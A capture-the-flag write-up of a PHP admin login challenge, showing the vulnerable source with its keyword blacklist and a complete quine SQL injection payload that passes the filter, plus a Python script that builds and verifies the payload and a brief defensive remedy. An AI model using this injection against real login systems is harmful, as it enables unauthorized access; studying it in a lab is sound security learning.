Opened the page and tried a weak password first; that was not it. Looking at the page source turned up a ?source hint, and visiting that URL revealed the source code:
<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
        die($FLAG);
    } else {
        alertMes("wrong password",'index.php');
    }
}
if(isset($_GET['source'])){
    show_source(__FILE__);
    die;
}
?>
<!-- /?source -->
<html>
<body>
<form action="/index.php" method="post">
    <input type="text" name="username" placeholder="账号"><br/>
    <input type="password" name="password" placeholder="密码"><br/>
    <input type="submit" / value="登录">
</form>
</body>
</html>
Reading the source shows that username must be exactly admin, and that the password is judged by the comparison $row['password'] === $password, where $row comes from the query built with the submitted password.
Then I was out of ideas; I read an article someone wrote online which said this is quine injection, something I had not come across before.
Quine
A quine is a self-reproducing program; in the SQL setting it means the submitted SQL expression evaluates to a string identical to the input itself.
The goal of quine injection: make the input and the output identical, so that the comparison of the stored/selected value with the submitted password succeeds and the login restriction is bypassed.
https://blog.csdn.net/weixin_53090346/article/details/125531088
The page source gives /?source, so visit that URL to get the code above.

The checkSql filter blocks the space character and the other keywords and characters listed in its regex (comparison operators, and, union is not blocked but in and substr are, and so on), and username must equal admin.
The basic form is
1'/**/union/**/select/**/replace(replace('r',char(34),char(39)),char(46),'r')#
where r is
1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#
Substituting the second string for both occurrences of r in the basic form gives the final payload:
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
Why it works: the leading 1' closes the password literal and the trailing # comments out the rest of the query, so the only row returned is the UNION one. The inner replace turns every " (char(34)) in the string into ' (char(39)), and the outer replace turns every . (char(46)) into the string itself, so the selected value is exactly the submitted password and $row['password'] === $password holds. Spaces are avoided with /**/ and none of the words used (union, select, replace, char) contain a blacklisted substring.
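As an added illustration, not part of the original writeup, the following Python reconstructs the payload from the three fixed pieces of the basic form above, emulates what MySQL computes for the injected SELECT, and checks both that the result equals the input (the quine property) and that the string gets past the checkSql blacklist ported from the PHP source. The regex describing the shape of the SELECT, the emulation of REPLACE with plain string replacement, and the function names are my own assumptions; no database is contacted and the sample inputs are constructed.

```python
import re
from typing import Optional

# Blacklist from checkSql() in the challenge source, ported from PCRE to Python.
# In the PHP string, "\ " matches a literal space and "\\\$" a literal dollar sign.
BLACKLIST = re.compile(
    r"regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|"
    r"extractvalue|floor|substr|&|;|\$|0x|sleep| ",
    re.IGNORECASE,
)

# The three fixed pieces of the basic form from the writeup; the two r
# placeholders sit between them.
PREFIX = "1'/**/union/**/select/**/replace(replace('"
MIDDLE = "',char(34),char(39)),char(46),'"
SUFFIX = "')#"


def build_payload() -> str:
    """Build the quine payload the way the writeup describes."""
    # r is the basic form with single quotes turned into double quotes and the
    # placeholder turned into '.', so r itself contains no single quote.
    r = (PREFIX + "." + MIDDLE + "." + SUFFIX).replace("'", '"')
    return PREFIX + r + MIDDLE + r + SUFFIX


# Assumed shape of the injected SELECT: replace(replace('A',char(34),char(39)),char(46),'B')
SELECT_SHAPE = re.compile(
    r"^1'/\*\*/union/\*\*/select/\*\*/"
    r"replace\(replace\('([^']*)',char\(34\),char\(39\)\),char\(46\),'([^']*)'\)#$"
)


def emulate_select(password: str) -> Optional[str]:
    """Emulate the value MySQL returns for the UNION row.

    The application query is  ... and password='<password>';  so the leading 1'
    closes the literal, the trailing # comments out the rest, and the returned
    column is replace(replace(A, '"', "'"), '.', B).
    """
    m = SELECT_SHAPE.match(password)
    if not m:
        return None
    a, b = m.group(1), m.group(2)
    return a.replace('"', "'").replace(".", b)


def passes_filter(s: str) -> bool:
    """True when checkSql() would let the string through."""
    return BLACKLIST.search(s) is None


def is_quine(password: str) -> bool:
    """True when the injected SELECT evaluates to the input itself."""
    return emulate_select(password) == password


if __name__ == "__main__":
    p = build_payload()
    print(p)
    print("passes filter:", passes_filter(p))
    print("quine:", is_quine(p))
```

Run directly, the block prints the payload and the two checks. From the defender's side the property being abused is visible in the emulation: the application concatenates user input into the SQL text and then compares the submitted password with whatever the query returns, so a query that returns its own input satisfies the check. A prepared statement with a bound parameter removes the UNION path entirely, and comparing against a stored hash rather than the raw password removes any value in echoing the input back.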

